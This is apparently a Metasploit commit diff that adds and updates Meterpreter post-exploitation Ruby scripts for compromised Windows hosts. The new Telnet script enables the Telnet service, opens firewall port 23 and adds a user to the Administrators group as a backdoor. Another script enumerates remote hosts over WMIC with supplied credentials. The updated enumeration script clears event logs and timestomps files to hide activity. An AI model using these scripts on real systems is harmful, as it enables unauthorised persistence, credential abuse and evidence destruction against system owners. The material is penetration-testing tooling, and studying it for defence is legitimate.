New scripts and updated scripts from Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-01-30 06:18:02 +00:00
parent f927320eda
commit e6ef0ab495
4 changed files with 519 additions and 17 deletions

View File

@ -0,0 +1,201 @@
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note: If the Telnet Server is not installed in Vista or win2k8
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
if trgtos =~ /(Windows Vista)/
if checkifinst(session)
print_status("Telnet Service Installed on Target")
else
print_status("Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
r.channel.close
r.close
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
end
def usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end

View File

@ -4,7 +4,7 @@ require 'ftools'
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Verion: 0.1.2
#Note:
################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
@ -15,7 +15,8 @@ require 'ftools'
"-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
"-hl" => [ true, "File with Host List for DNS Forward Lookup"],
"-d" => [ true, "Domain Name for DNS Forward Lookup"],
"-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"]
"-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
"-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
)
session = client
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
def stdlookup(session,domain,dest)
dest = dest + "-general-record-lookup.txt"
print_status("Getting MX and NS Records for Domain #{domain}")
filewrt(dest,"MX and NS Records for Domain #{domain}")
filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
types = ["SOA","NS","MX"]
mxout = []
results = []
garbage = []
types.each do |t|
begin
r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
mxout << d
end
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
r.close
results = mxout.to_s.split(/\n/)
results.each do |rec|
if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/
garbage << rec
else
print_status("\t#{rec}")
filewrt(dest,"#{rec}")
end
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ")
filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ")
garbage.clear
end
garbage.clear
end
rescue ::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
end
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
end
end
#-------------------------------------------------------------------------------
#Function for enumerating srv records
def srvreclkp(session,domain,dest)
dest = dest + "-srvenum.txt"
srout = []
garbage = []
srvrcd = [
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
"_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
print_status("Performing SRV Record Enumeration for #{domain}")
filewrt(dest,"SRV Record Enumeration for #{domain}")
srvrcd.each do |srv|
r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
srout << d
end
r.channel.close
r.close
results = srout.to_s.split(/\n/)
results.each do |rec|
if rec.match(/\s*internet\saddress\s\=\s/)
garbage << rec.split(/\s*internet\saddress\s\=/)
print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
garbage.clear
end
garbage.clear
srout.clear
end
end
end
#-------------------------------------------------------------------------------
#Function to print message during run
def message(dest)
print_status "Network Enumerator Meterpreter Script "
@ -231,10 +269,12 @@ frdlkp = nil
dom = nil
hostlist = nil
helpcall = nil
srvrc = nil
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-sr"
srvrc = 1
when "-rl"
rvrslkp = 1
when "-fl"
@ -249,6 +289,7 @@ helpcall = nil
hostlist = val
when "-r"
range = val
when "-h"
print(
"Network Enumerator Meterpreter Script\n" +
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
message(logs)
frwdlp(session,hostlist,dom,dest)
elsif dom != nil && stdlkp == 1
message(logs)
stdlookup(session,dom,dest)
elsif dom != nil && srvrc == 1
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil
print(
"Network Enumerator Meterpreter Script\n" +

View File

@ -0,0 +1,210 @@
#!/usr/bin/env ruby
#
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
# and Windows XP remote targets using native windows command wmic.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note:
################## Variable Declarations ##################
session = client
# Variables for Options
helpcall = 0
rusr = nil
rpass = nil
trg = ""
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu."],
"-t" => [ true, "The target address"],
"-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
"-p" => [ true, "Password of user on target system"]
)
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
# Create the log directory
::FileUtils.mkdir_p(logs)
# WMIC Commands that will be executed on the Target
wmic = [
'environment list',
'share list',
'nicconfig list',
'computersystem list',
'useraccount list',
'group list',
'sysaccount list',
'volume list brief',
'service list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'qfe list'
]
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in a array, returs string
def wmicexec(session,wmic,user,pass,trgt)
print_status("Running WMIC Commands ....")
tmpout = ''
command = nil
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
wmic.each do |wmi|
if user == nil
print_status("The commands will be ran under the credentials of #{runningas}")
command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
else
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
end
print_status "\trunning command wimic #{wmi}"
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
#print_status "\twmic #{command}"
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
sleep(2)
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
# Close output file in host
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
#-------------------------------------------------------------------------------
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each do |d|
output.puts(d)
end
output.close
end
#------------------------------------------------------------------------------
# Function to generate report header
def headerbuid(session,target,dest)
# Header for File that will hold all the output of the commands
info = session.sys.config.sysinfo
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
header << "Running as: #{client.sys.config.getuid}\n"
header << "From: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "Target: #{target}\n"
header << "\n\n\n"
print_status("Saving report to #{dest}")
header
end
#------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#------------------------------------------------------------------------------
# Function Help Message
def helpmsg
print(
"Remote Windows Enumeration Meterpreter Script\n" +
"This script will enumerate windows hosts in the target enviroment\n" +
"given a username and password or using the credential under witch\n" +
"Meterpeter is running using WMI wmic windows native tool.\n" +
"Usage:\n" +
@@exec_opts.usage
)
end
################## MAIN ##################
localos = winver(session)
# Check that the command is not being ran on a Win2k host
# since wmic is not present in Windows 2000
if localos =~ /(Windows 2000)/
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
else
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
trg = val
when "-u"
rusr = val
when "-p"
rpass = val
when "-h"
helpmsg
helpcall = 1
end
}
#logfile name
dest = logs + "/" + trg + filenameinfo
# Executing main logic of the script
if helpcall == 0 and trg != ""
# Making sure that is running as System a Username and Password for target machine must be provided
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
print_status("Stopped: Running as System and no user provided for connecting to target!!")
else trg != nil && helpcall != 1
filewrt(dest,headerbuid(session,trg,dest))
filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
end
elsif helpcall == 0 and trg == ""
helpmsg
end
end

View File

@ -3,7 +3,7 @@
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
# and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.3.2
#Verion: 0.3.4
#Note: Compleatly re-writen to make it modular and better error handling.
# Working on adding more Virtual Machine Checks and looking at improving
# the code but retain the independance of each module so it is easier for
@ -33,13 +33,18 @@ commands = [
'ipconfig /displaydns',
'route print',
'net view',
'netstat -na',
'netstat -nao',
'netstat -vb',
'netstat -ns',
'net accounts',
'net accounts /domain',
'net session',
'net share',
'net group',
'net user',
'net localgroup',
'net localgroup administrators',
'net group administrators',
'net view /domain',
'netsh firewall show config',
'tasklist /svc'
@ -62,11 +67,12 @@ cmdstomp = [
wmic = [
'computersystem list',
'useraccount list',
'group',
'group list',
'service list brief',
'volume list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'qfe',
]
#Specific Commands for Windows vista for Wireless Enumeration
@ -84,6 +90,12 @@ nonwin2kcmd = [
'wbem\\wmic.exe',
'netsh.exe',
]
# Executables not pressent in Windows 2000
nowin2kexe = [
'netsh.exe',
'tasklist.exe',
'wbem\\wmic.exe',
]
################## Function Declarations ##################
# Function to check if Target Machine a VM
@ -357,7 +369,7 @@ end
def covertracks(session,cmdstomp)
clrevtlgs(session)
info = session.sys.config.sysinfo
trgtos = info['OS']
trgtos = winver(session)
if trgtos =~ /(Windows 2000)/
chmace(session,cmdstomp - nonwin2kcmd)
else
@ -488,6 +500,36 @@ def killApp(session,procpid)
session.sys.process.kill(procpid)
print_status("Old process #{procpid} killed.")
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
# Function to execute process migration
@ -537,7 +579,7 @@ if helpopt != 1
header << "Host: #{info['Computer']}\n"
header << "OS: #{info['OS']}\n"
header << "\n\n\n"
trgtos = info['OS']
trgtos = winver(session)
print_status("Saving report to #{dest}")
filewrt(dest,header)
filewrt(dest,chkvm(session))
@ -566,7 +608,11 @@ if helpopt != 1
end
if (cm != nil)
filewrt(dest,"EventLogs where Cleared")
covertracks(session,cmdstomp)
if trgtos =~ /(Windows 2000)/
covertracks(session,cmdstomp - nowin2kexe)
else
covertracks(session,cmdstomp)
end
end
print_status("Done!")
end